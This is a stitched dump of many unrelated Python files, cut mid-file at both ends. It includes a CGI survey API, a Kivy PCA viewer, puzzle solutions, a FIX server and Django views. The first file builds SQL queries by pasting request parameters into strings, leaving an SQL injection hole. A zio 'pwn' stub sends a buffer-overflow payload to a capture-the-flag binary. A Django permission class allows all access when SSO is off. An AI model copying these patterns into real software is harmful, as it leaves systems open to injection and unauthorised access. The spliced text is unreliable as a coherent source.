`SH_DESC` TEXT,
`SH_SKIN` TEXT,
PRIMARY KEY (`SH_CODE`));''')
dbc.execute('''CREATE TABLE IF NOT EXISTS SURVEY_BDY
(`SB_HDR` INTEGER NOT NULL,
`SB_SEQ` INTEGER NOT NULL,
`SB_TYPE` TEXT NOT NULL DEFAULT 'Default',
`SB_TITLE` TEXT NOT NULL,
`SB_DESC` TEXT,
`SB_LABEL` TEXT,
`SB_MIN` INTEGER DEFAULT 1,
`SB_MAX` INTEGER DEFAULT 5,
`SB_BTN_1` TEXT DEFAULT 'Submit',
`SB_BTN_2` TEXT,
`SB_BTN_3` TEXT,
PRIMARY KEY (`SB_HDR`, `SB_SEQ`));''')
dbc.commit()
# execute SQL SELECT to Create JSON Data
csr = dbc.cursor()
if svCode == "*":
csr.execute("SELECT ROWID AS SH_ROWID,* FROM SURVEY_HDR WHERE SH_OWNER='" + svOwner + "' ORDER BY SH_CODE;")
else:
csr.execute("SELECT ROWID AS SH_ROWID,* FROM SURVEY_HDR WHERE SH_CODE='" + svCode + "';")
rows = csr.fetchall()
if rows != None:
# Convert to JSON Data
hdr_json = json.dumps( [dict(idx) for idx in rows] )
if svPart != "HEADER":
bdy_json = ""
hrow = json.loads(hdr_json)
for row in hrow:
# Extract the "rowid" from the First Row to GET key to the Body
sh_rowid = row['SH_ROWID']
if sh_rowid:
csr.execute("SELECT ROWID AS SB_ROWID,* FROM SURVEY_BDY WHERE SB_HDR=" \
+ str(sh_rowid) + " ORDER BY SB_SEQ ASC")
rows = csr.fetchall()
bdy_json += json.dumps( [dict(idx) for idx in rows] )
#
# Print HTTP Response JSON
#
print "Content-Type: application/json"
print
if svPart == "HEADER":
print hdr_json
if svPart == "BODY":
print bdy_json
if svPart == "BOTH":
print '{"HEADER":' + hdr_json + ',"BODY":' + bdy_json + '}'
except sqlite3.Error, e:
# Handle Exceptions
if dbc:
dbc.rollback()
print "Content-Type: text/plain"
print
print "ERR: " + e.args[0]
finally:
if dbc:
dbc.close()
# Run The Program
main()
|
import matplotlib.pyplot as plt
from kivy.garden.matplotlib.backend_kivyagg import FigureCanvas
from kivy.graphics.texture import Texture
from kivy.lang import Builder
from kivy.logger import Logger
from kivy.properties import NumericProperty, ObjectProperty
from kivy.uix.image import Image
from kivy.uix.screenmanager import Screen
from numpy import *
kv = '''
BoxLayout:
orientation: 'vertical'
padding: [0, 10]
Label:
text:
" Drag the slider to select the number of components you'd like to analyze.\\n" + \
"The more components you select, the more variance your dataset will have."
halign: 'center'
size_hint: (1, 0.1)
BoxLayout:
orientation: 'vertical'
size_hint: (1, 0.15)
id: num_components_select
Label:
text: "Number of components: %d" % app.pca_components
halign: 'center'
AnchorLayout:
anchor_x: 'center'
Slider:
size_hint: (.8, 1)
min: 1
max: app.maximum_pca_components
value: app.pca_components
on_value: app.pca_components = self.value
BoxLayout:
orientation: 'horizontal'
padding: [30, 30]
BoxLayout:
size_hint: (0.35, 1)
orientation: 'vertical'
BoxLayout:
orientation: 'vertical'
id: before_images
Label:
size_hint: (1, 0.2)
text: 'Original'
halign: 'center'
BoxLayout:
orientation: 'horizontal'
PCAFaceImage:
dataset: app.dataset
index: 0
PCAFaceImage:
dataset: app.dataset
index: 1
BoxLayout:
orientation: 'vertical'
id: after_images
Label:
size_hint: (1, 0.2)
text: 'Reconstruction with %d components' % app.pca_components
halign: 'center'
BoxLayout:
orientation: 'horizontal'
PCAFaceImage:
dataset: app.dataset
index: 0
pca_transformer: app.pca_transformer
PCAFaceImage:
dataset: app.dataset
index: 1
pca_transformer: app.pca_transformer
PCAGraph:
size_hint: (0.65, 1)
id: pca_graph
padding: 5
pca_data: app.pca_data
maximum_pca_components: app.maximum_pca_components
pca_components: app.pca_components
BoxLayout:
size_hint: (1, .15)
orientation: 'horizontal'
AnchorLayout:
anchor_x: 'right'
anchor_y: 'center'
padding: [10, 0]
Button:
text: 'Back'
on_press: app.go_back()
size_hint: (.6, .8)
AnchorLayout:
anchor_x: 'left'
anchor_y: 'center'
padding: [10, 0]
Button:
text: 'Next'
on_press: app.go_next()
size_hint: (.6, .8)
'''
class PCAFaceImage(Image):
dataset = ObjectProperty()
index = NumericProperty(-1)
pca_transformer = ObjectProperty()
def __init__(self, **kwargs):
super(PCAFaceImage, self).__init__(**kwargs)
self.bind(
dataset=self.plot_image,
index=self.plot_image,
pca_transformer=self.plot_image
)
def plot_image(self, instance, value):
if value is None or self.dataset is None or self.index < 0:
return
_, height, width = self.dataset['images'].shape
self.texture = Texture.create(size=(width, height), colorfmt='luminance')
image_data = self.dataset['images'][self.index]
if self.pca_transformer is not None:
if len(self.pca_transformer.mean_) != len(image_data.flatten()):
return
image_data = self.pca_transformer.reconstruct(image_data)
self.texture.blit_buffer((image_data[::-1] * 255).astype(ubyte).tostring(), colorfmt='luminance', bufferfmt='ubyte')
self.canvas.ask_update()
class PCAGraph(FigureCanvas):
maximum_pca_components = NumericProperty()
pca_components = NumericProperty()
pca_data = ObjectProperty()
def __init__(self, **kwargs):
fig, ax = plt.subplots()
super(PCAGraph, self).__init__(fig, **kwargs)
ax.spines['top'].set_visible(False)
ax.spines['right'].set_visible(False)
ax.get_xaxis().tick_bottom()
ax.get_yaxis().tick_left()
self.ax = ax
self.bind(
maximum_pca_components=self.plot_pca_variance,
pca_components=self.plot_pca_variance,
pca_data=self.plot_pca_variance
)
def plot_pca_variance(self, instance, value):
if value is None \
or self.pca_data is None \
or self.maximum_pca_components < 0 \
or self.pca_components < 0 \
or self.pca_data.explained_variance.shape[0] != self.maximum_pca_components \
or self.pca_components >= self.maximum_pca_components:
return
Logger.debug("Updating PCA graph for max %d with %s at %d" % (
self.maximum_pca_components, str(self.pca_data.explained_variance.shape), self.pca_components))
ax = self.ax
ax.cla()
v = self.pca_data.explained_variance.cumsum()
ax.plot(arange(self.maximum_pca_components), v)
ax.set_xlabel('Number of Components')
ax.set_ylabel('Total Explained Variance')
ax.set_xlim([0, self.maximum_pca_components])
ax.set_ylim([0, 1.0])
ax.axhline(v[self.pca_components - 1], color='blue', linewidth=1)
from numpy.linalg.linalg import LinAlgError
try:
ax.axvline(self.pca_components, color='blue', linewidth=3)
except LinAlgError:
pass
self.draw()
class RunPCA(Screen):
def __init__(self, **kwargs):
super(RunPCA, self).__init__(**kwargs)
self.add_widget(Builder.load_string(kv))
|
from zio import *
target = "./ascii_easy"
def get_io(target):
read_mode = COLORED(RAW, "green")
write_mode = COLORED(RAW, "blue")
io = zio(target, timeout = 9999)#, print_read = read_mode, print_write = write_mode)
return io
def pwn(io):
#io.interact()
#io.read_until(":")
io.gdb_hint()
ebp = 'a' * 4
ret = l32(0x80000000)
payload = 'a' * 0xa8# + ebp + ret
io.write(payload + "\n")
io.interact()
io = get_io(target)
pwn(io) |
# 020
# Valid Parentheses
# 2015-04-28
#####################################################
class Solution:
# @param {string} s
# @return {boolean}
def isValid(self, s):
stack = []
for c in s:
if not stack:
stack.append(c)
elif (c == ')' and stack[-1] == '(') or (c == ']' and stack[-1] == '[') or (c == '}' and stack[-1] == '{'):
stack.pop()
else:
stack.append(c)
return not stack
#####################################################
s = "]"
print(s)
sol = Solution()
z = sol.isValid(s)
print("True" if z else "False")
|
# HRI - Keyboard Commands for Marley
#git push
import RPi.GPIO as GPIO
import time
import pygame
import RGB
from pygame.locals import *
pygame.init()
done = 0
while done == False:
for event in pygame.event.get():
# any other key event input
if event.type == pygame.QUIT:
done = True
elif event.type == KEYDOWN:
if event.key == K_ESC:
done = 1
# get key current state
keys = pygame.key.get_pressed()
if keys[K_LEFT]:
print 'left pressed!'
|
import logging
import socket
from pyfix.journaler import DuplicateSeqNoError
from pyfix.session import FIXSession
from pyfix.connection import FIXEndPoint, ConnectionState, MessageDirection, FIXConnectionHandler
from pyfix.event import FileDescriptorEventRegistration, EventType
class FIXServerConnectionHandler(FIXConnectionHandler):
def __init__(self, engine, protocol, sock=None, addr=None, observer=None):
FIXConnectionHandler.__init__(self, engine, protocol, sock, addr, observer)
def handleSessionMessage(self, msg):
protocol = self.codec.protocol
recvSeqNo = msg[protocol.fixtags.MsgSeqNum]
msgType = msg[protocol.fixtags.MsgType]
targetCompId = msg[protocol.fixtags.TargetCompID]
senderCompId = msg[protocol.fixtags.SenderCompID]
responses = []
if msgType == protocol.msgtype.LOGON:
if self.connectionState == ConnectionState.LOGGED_IN:
logging.warning("Client session already logged in - ignoring login request")
else:
# compids are reversed here...
self.session = self.engine.getOrCreateSessionFromCompIds(senderCompId, targetCompId)
if self.session is not None:
try:
self.connectionState = ConnectionState.LOGGED_IN
self.heartbeatPeriod = float(msg[protocol.fixtags.HeartBtInt])
responses.append(protocol.messages.Messages.logon())
self.registerLoggedIn()
except DuplicateSeqNoError:
logging.error("Failed to process login request with duplicate seq no")
self.disconnect()
return
else:
logging.warning("Rejected login attempt for invalid session (SenderCompId: %s, TargetCompId: %s)" % (senderCompId, targetCompId))
self.disconnect()
return # we have to return here since self.session won't be valid
elif self.connectionState == ConnectionState.LOGGED_IN:
# compids are reversed here
if not self.session.validateCompIds(senderCompId, targetCompId):
logging.error("Received message with unexpected comp ids")
self.disconnect()
return
if msgType == protocol.msgtype.LOGOUT:
self.connectionState = ConnectionState.LOGGED_OUT
self.registerLoggedOut()
self.handle_close()
elif msgType == protocol.msgtype.TESTREQUEST:
responses.append(protocol.messages.Messages.heartbeat())
elif msgType == protocol.msgtype.RESENDREQUEST:
responses.extend(self._handleResendRequest(msg))
elif msgType == protocol.msgtype.SEQUENCERESET:
newSeqNo = msg[protocol.fixtags.NewSeqNo]
self.session.setRecvSeqNo(int(newSeqNo) - 1)
recvSeqNo = newSeqNo
else:
logging.warning("Can't process message, counterparty is not logged in")
return (recvSeqNo, responses)
class FIXServer(FIXEndPoint):
def __init__(self, engine, protocol):
FIXEndPoint.__init__(self, engine, protocol)
def start(self, host, port):
self.connections = []
self.socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.socket.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
self.socket.bind((host, port))
self.socket.listen(5)
self.serverSocketRegistration = FileDescriptorEventRegistration(self.handle_accept, self.socket, EventType.READ)
logging.debug("Awaiting Connections " + host + ":" + str(port))
self.engine.eventManager.registerHandler(self.serverSocketRegistration)
def stop(self):
logging.info("Stopping server connections")
for connection in self.connections:
connection.disconnect()
self.serverSocketRegistration.fd.close()
self.engine.eventManager.unregisterHandler(self.serverSocketRegistration)
def handle_accept(self, type, closure):
pair = self.socket.accept()
if pair is not None:
sock, addr = pair
logging.info("Connection from %s" % repr(addr))
connection = FIXServerConnectionHandler(self.engine, self.protocol, sock, addr, self)
self.connections.append(connection)
for handler in filter(lambda x: x[1] == ConnectionState.CONNECTED, self.connectionHandlers):
handler[0](connection)
|
from django.conf import settings
from rest_framework.permissions import BasePermission
class IsAuthenticated(BasePermission):
"""
Allows access when DEBUG else only to authenticated users.
"""
def has_permission(self, request, view):
"""Ignore usual authentication and autherization if SSO is not enabled"""
if not settings.SSO_ENABLED:
return True
return request.user and request.user.is_authenticated
|
import time
from behave import *
use_step_matcher("parse")
@then(u'I delete the address "{address_field}"')
def step_impl(context, address_field):
from booking_manager.models import Address
address = Address.objects.filter(address_field=address_field).get()
context.browser.visit(context.get_url('delete_address', pk=address.id))
context.browser.find_by_value('Yes').click()
@then(u'I cancel to delete the address "{address_field}"')
def step_impl(context, address_field):
from booking_manager.models import Address
address = Address.objects.filter(address_field=address_field).get()
context.browser.visit(context.get_url('delete_address', pk=address.id))
context.browser.find_by_value('Cancel').click()
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Created on Sun Jul 29 17:33:16 2018
@author: vmueller
"""
import numpy as np
import matplotlib.pyplot as plt
import pandas as pd
from rnn_utility_functions import save_model, load_model
from matplotlib.finance import candlestick_ohlc
from matplotlib import style
import matplotlib.dates as mdates
style.use('ggplot')
# First Step is to Import Dataset
dataset = pd.read_csv('A/A_Price.csv')
dataset_train = dataset.iloc[3000:4300,:]
dataset_test = dataset.iloc[4300:,:]
delta_days = 30
# Importing the training set
training_set = dataset_train.iloc[:, 5:6].values
# Feature Scaling
from sklearn.preprocessing import MinMaxScaler
sc = MinMaxScaler(feature_range = (0, 1))
training_set_scaled = sc.fit_transform(training_set)
delta_days = 30
loaded_model = load_model()
# Getting the real stock price
real_stock_price = dataset_test.iloc[:, 5:6].values
# Getting the predicted stock price
dataset_total = pd.concat((dataset_train['Adj Close'], dataset_test['Adj Close']), axis = 0)
inputs = dataset_total[len(dataset_total) - len(dataset_test) - delta_days:].values
inputs = inputs.reshape(-1,1)
inputs = sc.transform(inputs)
X_test = []
for i in range(delta_days, len(dataset_test) + delta_days):
X_test.append(inputs[i-delta_days:i, 0])
X_test = np.array(X_test)
X_test = np.reshape(X_test, (X_test.shape[0], X_test.shape[1], 1))
predicted_stock_price_m = loaded_model.predict(X_test)
predicted_stock_price_m = sc.inverse_transform(predicted_stock_price_m)
# Visualising the results
plt.plot(real_stock_price, color = 'red', label = 'Real Agile Technologies Stock Price')
plt.plot(predicted_stock_price_m, color = 'blue', label = 'Predicted Agile Technologies Stock Price')
plt.title('Agilent Technologies (A) Price Prediction')
plt.xlabel('Time')
plt.ylabel('Agile Technologies Stock Price')
plt.legend()
plt.show() |
from PIL import Image
from pyrandomdotorg.pyRandomdotOrg import *
SIZE_ROW = 127
SIZE_COLUMN = 127
user = ['name', 'email']
random = clientlib(user[0], user[1])
img = Image.new('RGB', (SIZE_ROW, SIZE_COLUMN), "white") # Create a new white image
pixels = img.load() # Create the pixel map
# Iterate through the pixels
for i in xrange(img.size[0]):
"""
Generate a column of RGB values. Originally, I wanted to request all of the values at the very
beginning, but random.org didn't like that. The downside to this approach of requesting column
by column is that it takes some time to generate the final image.
"""
rgb_values = random.IntegerGeneratorList(SIZE_COLUMN * 3, 0, 255)
for j in xrange(img.size[1]):
# Set the colors accordingly
pixels[i,j] = (rgb_values[j * 3],\
rgb_values[j * 3 + 1],\
rgb_values[j * 3 + 2])
img.show() |
#!/usr/bin/python
# -*- coding: UTF-8 -*-
import threading
import time
# 定义执行函数
def chihuoguo(people):
print('%s 吃火锅的小伙伴-羊肉:%s' % (time.ctime(), people))
time.sleep(1)
print('%s 吃火锅的小伙伴-鱼丸:%s' % (time.ctime(), people))
# 定义自己的thread,继承threading.Thread,重写__init__和run方法
class MyThread(threading.Thread):
def __init__(self, people, name):
'''重写threading.Thread初始化内容'''
threading.Thread.__init__(self)
self.threadName = name
self.people = people
def run(self):
'''重写run方法'''
print '开始线程' + self.threadName
chihuoguo(self.people)
print '结束线程' + self.threadName
thread1 = MyThread('小明', 'Thread-1')
thread2 = MyThread('小张', 'Thread-2')
thread1.start()
thread2.start()
time.sleep(0.5)
print '退出主线程'
|
from celery.task import task
from wallet.models import UserWallet
from utils.web3 import Web3Util
from config.models import NodeConfig
@task()
def collect_deposit_funds():
web3 = Web3Util()
wallets = UserWallet.objects.filter(status=False)
config = NodeConfig.objects.get()
_to = config.master_wallet_address
gas_price, err = web3.get_gas_price()
if err is not None:
print(err)
if gas_price is not None:
for wallet in wallets:
balance = web3.watch_balance(wallet.wallet_address)
if balance > 0:
_from = wallet.wallet_address
gas, fee_error = web3.estimate_fee(_to, _from, balance)
if fee_error is not None:
print(_to, _from, balance, fee_error)
break
fee = gas_price * gas
final_balance = (balance - fee);
message = ""
if final_balance > 0:
tx_hash, error = web3.send_from(_to,
_from,
final_balance,
wallet.reference)
if tx_hash is not None:
message = tx_hash
wallet.tx_hash = tx_hash
wallet.status = True
wallet.save()
else:
message = error
print("To {} From {} fee {} balance {} message {}".format(_to, _from, fee, final_balance, message))
else:
print("Insufficient balance to transfer original balance{} fee {} final balance {}".format(balance, fee, final_balance))
|
from aiohttp import web
from python_machine_learning.middleware import python_machine_learning_middleware
from python_machine_learning.routes import all_routes
import logging
import settings
logging.basicConfig(
format='%(asctime)s:%(levelname)s - %(message)s',
level=logging.INFO,
datefmt="%Y-%m-%d %H:%M:%S"
)
app = web.Application(middlewares=[python_machine_learning_middleware])
app.add_routes(all_routes)
def run_server():
connection_args = {
"host": settings.SERVER_HOST,
"port": settings.SERVER_PORT
}
logging.info('App run!')
web.run_app(app=app, **connection_args) |
score = input("Input your score (0.0 - 1.0): ")
sc = float(score)
if 0.0 <= sc <= 1.0:
if sc < 0.6:
print("F")
elif 0.6 <= sc < 0.7:
print("D")
elif 0.7 <= sc < 0.8:
print("C")
elif 0.8 <= sc < 0.9:
print("B")
elif 0.9 <= sc < 1.0:
print("A")
else:
print("Value out of range.")
|
from .card import Card
from ..utility import Logger
class ItIsYourBirthday(Card):
'''
It is your birthday. Collect £10 from each player.
'''
def play(self, game, current_player):
'''
The player gets £10 from each other player. ( £100 if the player
does not say "Happy Birthday!")
'''
from ..game import Game
Logger.log("It is {0}'s birthday".format(current_player.name))
Logger.indent()
# We get £10 from each player...
for player in game.state.players:
if player is current_player:
continue
# We see if the player says "Happy Birthday!"...
message = player.call_ai(player.ai.players_birthday)
Logger.log("{0} says {1}".format(player.name, message))
if message == "Happy Birthday!":
amount = 10
else:
amount = 100
# We take the money from the player, and give it to
# the current player...
game.transfer_cash(player, current_player, amount, Game.Action.PAY_AS_MUCH_AS_POSSIBLE)
Logger.dedent()
|
# -*- coding: utf-8 -*-
# Define here the models for your scraped items
#
# See documentation in:
# https://doc.scrapy.org/en/latest/topics/items.html
import scrapy
class SuningCategoryItem(scrapy.Item):
# 分类id
CategoryId = scrapy.Field()
# 分类名称
CategoryName = scrapy.Field()
# 上级id
parentId = scrapy.Field()
class SuningUrlLogItem(scrapy.Item):
# 爬取地址
url = scrapy.Field()
# 爬虫类型
type = scrapy.Field()
# 爬虫地址名称
title = scrapy.Field()
# 爬虫来源地址
RefererUrl = scrapy.Field()
class SuningItem(scrapy.Item):
pass
|
# Import libarary
import matplotlib.pyplot as plt
import numpy as np
from mpl_toolkits.mplot3d import Axes3D, proj3d
from IPython import display
from itertools import product, combinations
import tensorflow as tf
import numpy as np
import os
import shutil
import argparse
import time
from ENV import Env
# Import custom libraries
from ENV import Env
from ddpg import Actor, Critic, Memory
# np.random.seed(1)
# tf.set_random_seed(1)
VAR_MIN = 0.001
# Parameters
parser = argparse.ArgumentParser()
parser.add_argument('--memory', type=int, default=15000,
help='memory size for algorithm')
parser.add_argument('--batch_size', type=int, default=200,
help='minibatch size')
parser.add_argument('--lr_actor', type=float, default=1e-4,
help='learning rate for Actor network')
parser.add_argument('--lr_critic', type=float, default=1e-4,
help='learning rate for Critic network')
parser.add_argument('--target_update_a', type=int, default=1100,
help='update frequency for Actor target network')
parser.add_argument('--target_update_c', type=int, default=1000,
help='update frequency for Critic target network')
parser.add_argument('--gamma', type=float, default=0.9,
help='reward discount factor')
args = parser.parse_args()
MEMORY_CAPACITY = args.memory
BATCH_SIZE = args.batch_size
LR_A = args.lr_actor
LR_C = args.lr_critic
REPLACE_ITER_A = args.target_update_a
REPLACE_ITER_C = args.target_update_c
GAMMA = args.gamma
env = Env()
STATE_DIM = env.state_dim
ACTION_DIM = env.action_dim
ACTION_BOUND = env.action_bound
config = tf.ConfigProto()
config.gpu_options.allow_growth = True
config.log_device_placement=True
sess = tf.Session(config=config)
# Create actor and critic.
actor = Actor(sess, ACTION_DIM, ACTION_BOUND[1], LR_A, REPLACE_ITER_A)
critic = Critic(sess, STATE_DIM, ACTION_DIM, LR_C, GAMMA, REPLACE_ITER_C, actor.a, actor.a_)
actor.add_grad_to_graph(critic.a_grads)
M = Memory(MEMORY_CAPACITY, dims=2 * STATE_DIM + ACTION_DIM + 1)
saver = tf.train.Saver()
path = './checkpoints'
saver.restore(sess, tf.train.latest_checkpoint(path))
def eval():
s = env.reset()
while True:
a = actor.choose_action(s)
s_, r, done, collision = env.step(a)
s = s_
def eval_count():
test_num = 100
succ_count = 0
succ_point = []
fail_point = []
for i in range(test_num):
s = env.reset()
point = env.point_info.copy()
print('env.point_info: ', env.point_info, 'point: ', point)
for j in range(150):
# if RENDER:
# env.render()
a = actor.choose_action(s)
s_, r, done, collision = env.step(a)
if done :#& (not collision):
succ_count += 1
succ_point.append(point)
break
else:
s = s_
if not done:
fail_point.append(point)
print('succ_point: ', succ_point)
print('fail_point: ', fail_point)
print('success cases/total test : %i/%i '%( succ_count , test_num))
def eval_plot():
pos_x = []
pos_y = []
pos_z = []
s = env.reset()
pos = env.EE.copy()
pos_x.append( env.EE.copy()[0])
pos_y.append( env.EE.copy()[1])
pos_z.append( env.EE.copy()[2])
tar = env.point_info.copy()
for j in range(150):
a = actor.choose_action(s)
s_, r, done,collision = env.step(a)
s = s_
pos_x.append( env.EE.copy()[0])
pos_y.append( env.EE.copy()[1])
pos_z.append( env.EE.copy()[2])
fig = plt.figure(figsize=(12, 8))
ax = fig.gca(projection='3d')
txt1 = ax.plot(pos_x, pos_y, pos_z, c='r' , linewidth=6, label='predicted')
txt2 = ax.scatter(tar[0], tar[1], tar[2], c='k', s = 120, label='target')
plt.title('End-effector trajectory in simulation', fontsize = 20)
ax.set_xlabel('x [cm]')
ax.set_ylabel('y [cm]')
ax.set_zlabel('z [cm]')
#draw cube
r1 = [20, 54]
r2 = [0,34]
r3 = [-66, -32]
for s, e in combinations(np.array(list(product(r1,r2,r3))), 2):
if np.sum(np.abs(s-e)) == r1[1]-r1[0]:
ax.plot3D(*zip(s,e), color="b" , linewidth=3, label = 'tabel')
plt.show()
if __name__ == '__main__':
eval_plot()
# eval()
# eval_count() |
# Product
class Vehicle(object):
__go = False # The vehicle rides or isn't moving
def __init__(self):
self._type = None
self._wheels = None
self._doors = None
self._seats = None
def get_doors(self):
return self._doors
def get_seats(self):
return self._seats
def get_wheels(self):
return self._wheels
def start(self):
self.__go = True
def stop(self):
self.__go = False
def __str__(self):
go = 'rides' if self.__go else 'is not moving'
return '{} {}'.format(self._type, go)
def view(self):
print('The vehicle "{}" consists of {} wheels, {} doors and {} seats'.\
format(self._type, self._wheels, self._doors, self._seats))
# Concrete Product 1
class Car(Vehicle):
def __init__(self):
self._type = "Car"
self._wheels = 4
self._doors = 4
self._seats = 5
# Concrete Factory 1
class Bike(Vehicle):
def __init__(self):
self._type = "Bike"
self._wheels = 2
self._doors = 0
self._seats = 2
class VehicleFactory(object):
@classmethod
def construct_vehicle(self, type):
if type == "Car":
return Car()
elif type == "Bike":
return Bike()
#===========================================================
if __name__ == "__main__":
car = VehicleFactory.construct_vehicle("Car")
car.view()
print(car)
car.start()
print(car)
car.stop()
print(car)
bike = VehicleFactory.construct_vehicle("Bike")
bike.view()
print(bike)
bike.start()
print(bike)
|
from __future__ import absolute_import, unicode_literals
from django.views.generic.edit import CreateView, UpdateView
from django.views.generic import DetailView
from .models import Output, LogFrame, Indicator, SubIndicator
from .forms import (OutputForm, IndicatorFormSet, SubIndicatorForm,
BaseInlineFormSetWithEmpty)
class OutputBase(object):
model = Output
form_class = OutputForm
context_object_name = 'output'
template_name = 'logframe/output_edit_form.html'
def get_context_data(self, **kwargs):
context = super(OutputBase, self).get_context_data(**kwargs)
context['milestones'] = self.get_object().log_frame.milestone_set.all()
context['indicators'] = self.create_indicator_formset()
return context
def create_indicator_formset(self, output=None):
if output is None:
output = self.get_object()
indicator_formset = IndicatorFormSet(
data=(self.request.POST if self.request.method == 'POST' else None),
instance=output,
prefix='indicator_set_ind',
initial=[
{
'name': '',
'description': '',
},
])
for i, form in enumerate(indicator_formset):
indicator = form.instance
indicator.output = output
# Subclass ModelForm for SubIndicator, to populate new (empty)
# instances of SubIndicator with the correct Indicator, so that
# they can get their Milestones.
class CustomSubIndicatorForm(SubIndicatorForm):
def __init__(self, instance=None, **kwargs):
if instance is None:
instance = SubIndicator(indicator=indicator)
super(CustomSubIndicatorForm, self).__init__(
instance=instance, **kwargs)
from django.forms.models import inlineformset_factory
SubIndicatorFormSet = inlineformset_factory(
Indicator, SubIndicator, extra=0, form=CustomSubIndicatorForm,
formset=BaseInlineFormSetWithEmpty)
if form.empty:
i = '__prefix__'
form.subindicators = SubIndicatorFormSet(
data=(self.request.POST if self.request.method == 'POST' else None),
instance=indicator,
prefix="ind-%s_subindicator_set_subind" % i,
initial=[
{'indicator_id': indicator.id}
])
for j, sif in enumerate(form.subindicators):
subindicator = sif.instance
from .forms import TargetFormSet
sif.targets = TargetFormSet(
queryset=subindicator.targets_fake_queryset,
instance=subindicator,
prefix="subindicator_%s_%d_targets" % (i, j))
return indicator_formset
def get_success_url(self):
from django.core.urlresolvers import reverse
return reverse('logframe-output-update', kwargs={'pk': self.object.pk})
def form_valid(self, form):
indicator_formset = self.create_indicator_formset()
if not indicator_formset.is_valid():
return self.form_invalid(form)
if form.instance.order is None:
from django.db.models import Max
max_order = form.instance.log_frame.output_set.aggregate(Max('order'))['order__max']
if max_order is None:
new_order = 1
else:
new_order = max_order + 1
form.instance.order = new_order
# save the Output object before its dependents:
response = super(OutputBase, self).form_valid(form)
# recreate the formset now that the Output has a PK to attach to
indicator_formset = self.create_indicator_formset(self.object)
if not indicator_formset.is_valid():
# we validated all the parameters earlier!
raise AssertionError('The formset was valid but no longer is')
indicator_formset.save()
for form in indicator_formset:
# TODO: add stuff for when forms aren't valid
if form.subindicators.is_valid():
form.subindicators.save()
for sif in form.subindicators:
if sif.targets.is_valid():
sif.targets.save()
return response
class OutputCreate(OutputBase, CreateView):
# We should really create the Output object in the database, with a
# foreign key back to its own LogFrame before we start editing it; or
# else find a way to pass the correct LogFrame ID into this view and
# validate it here (same owner etc.) This is a stopgap until we have
# real support for creating LogFrames in the web interface.
def __init__(self, **kwargs):
super(OutputCreate, self).__init__(**kwargs)
# TODO: the logframe id should be an argument to the view
self.default_log_frame = LogFrame.objects.first()
def get_form_kwargs(self):
kwargs = super(OutputCreate, self).get_form_kwargs()
kwargs['instance'] = self.get_object()
return kwargs
def get_object(self):
return Output(log_frame=self.default_log_frame)
class OutputUpdate(OutputBase, UpdateView):
pass
class Overview(DetailView):
model = LogFrame
template_name = 'logframe/logframe_overview.html'
class IndicatorMonitor(UpdateView):
model = Indicator
template_name = 'logframe/indicator_monitor.html'
|
"""
Given a binary tree of integers, find the maximum path sum between two nodes. The path must go through at least one node, and does not need to go through the root.
"""
from __future__ import annotations
from math import inf
from typing import Any
class Node:
val: Any
left: Node
right: Node
def __init__(self, val: Any, left: Node = None, right: Node = None):
self.val = val
self.left = left
self.right = right
def __repr__(self):
rpz = f"Node({self.val}"
if self.left or self.right:
rpz += f", {self.left}"
if self.right:
rpz += f", {self.right}"
return rpz + ")"
def helper(root: Node) -> int:
if not root:
return 0
left, right = helper(root.left), helper(root.right)
maxLR = max(max(left, right) + root.val, root.val)
helper.max = max(helper.max, max(maxLR, left + right + root.val))
return maxLR
def maxPathSum(root: Node) -> int:
helper.max = -inf
helper(root)
return helper.max
tree = Node(-1, Node(3, Node(1)), Node(4, Node(2), Node(-2, Node(7))))
print(f"maxPathSum({tree}) = {maxPathSum(tree)}")
tree.left.left.val = 3
print(f"maxPathSum({tree}) = {maxPathSum(tree)}")
tree.val = -10
print(f"maxPathSum({tree}) = {maxPathSum(tree)}")
|
def toLetter(n):
if (n == None):
return ''
return 'ABCDEFGHIJKLMNOPQRSTUVWXYZ'[n]
def f(nums):
order = []
firstFlag = True
while(True):
flag = False
for i,n in enumerate(nums):
if (n > 0):
order.append(i)
nums[i] -= 1
flag = True
if (firstFlag and len(nums) == 3):
firstFlag = False
order.append(None)
if (not flag):
break
if (len(order)%2 == 1):
order.append(None)
ans = []
order.reverse()
for i in range(0, len(order), 2):
ans.append(toLetter(order[i]) + (toLetter(order[i+1]) if i+1<len(order) else ''))
return ' '.join(ans)
t = int(input())
for i in range(t):
n = input()
nums = list(map(int, input().split()))
print('Case #' + str(i+1) + ':', f(nums))
|
from django.shortcuts import render
from rest_framework import generics
from .models import Board
from .serializer import BoardSerializer
from .permissions import IsOwnerOrReadOnly
# Create your views here.
class BoardList(generics.ListCreateAPIView):
queryset = Board.objects.all()
serializer_class = BoardSerializer
from rest_framework.authentication import TokenAuthentication
from rest_framework.permissions import IsAuthenticated
class BoardDetail(generics.RetrieveUpdateDestroyAPIView):
authentication_classes = (TokenAuthentication,)
permission_classes = (IsAuthenticated,IsOwnerOrReadOnly)
queryset = Board.objects.all()
serializer_class = BoardSerializer
|
t = int(input())
for cases in range(t):
n = int(input())
arr = list(map(int,input().strip().split()))
dp = [0]*(n+1)
dp[0] = 0
for i in range(1,n+1):
max_val = -2**31
for j in range(i):
max_val = max(max_val,arr[j]+dp[i-j-1])
dp[i] = max_val
print(dp[n])
|
import pygame
import numpy as np
from ... import twist
from ..objects import PySceneImage
from .base import create_surface, ButtonStyle
from .style_color import color_tones
class ClassicButtonStyle(ButtonStyle):
def __init__(self, color, disabled_color, reverse=False, intensity=12, border=3):
self.border = border
self.reverse = reverse
self.intensity = intensity
self.color = twist.color(color)
self.disabled_color = twist.color(disabled_color)
def get_image(self, rect):
self.rect = rect
return self.build_simple()
def build_simple(self):
bright, normal, dark = map(twist.color, color_tones(self.color, self.intensity))
return PySceneImage(
self.create_simple(normal),
self.create_simple(bright),
self.create_simple(normal, True),
self.create_simple(self.disabled_color),
)
def create_simple(self, color, reverse=False):
bright, normal, dark = map(twist.color, color_tones(color, self.intensity))
bright_decimal = np.sum(np.array(bright) << np.array((16, 8, 0, 24)))
dark_decimal = np.sum(np.array(dark) << np.array((16, 8, 0, 24)))
image = create_surface(normal, self.rect.size)
array = pygame.surfarray.pixels2d(image)
w, h = array.shape
for y in range(self.border):
for x in range(y, w - y):
if reverse:
array[x][y] = dark_decimal
array[x][h - y - 1] = bright_decimal
else:
array[x][y] = bright_decimal
array[x][h - y - 1] = dark_decimal
for x in range(self.border):
for y in range(x, h - x):
if reverse:
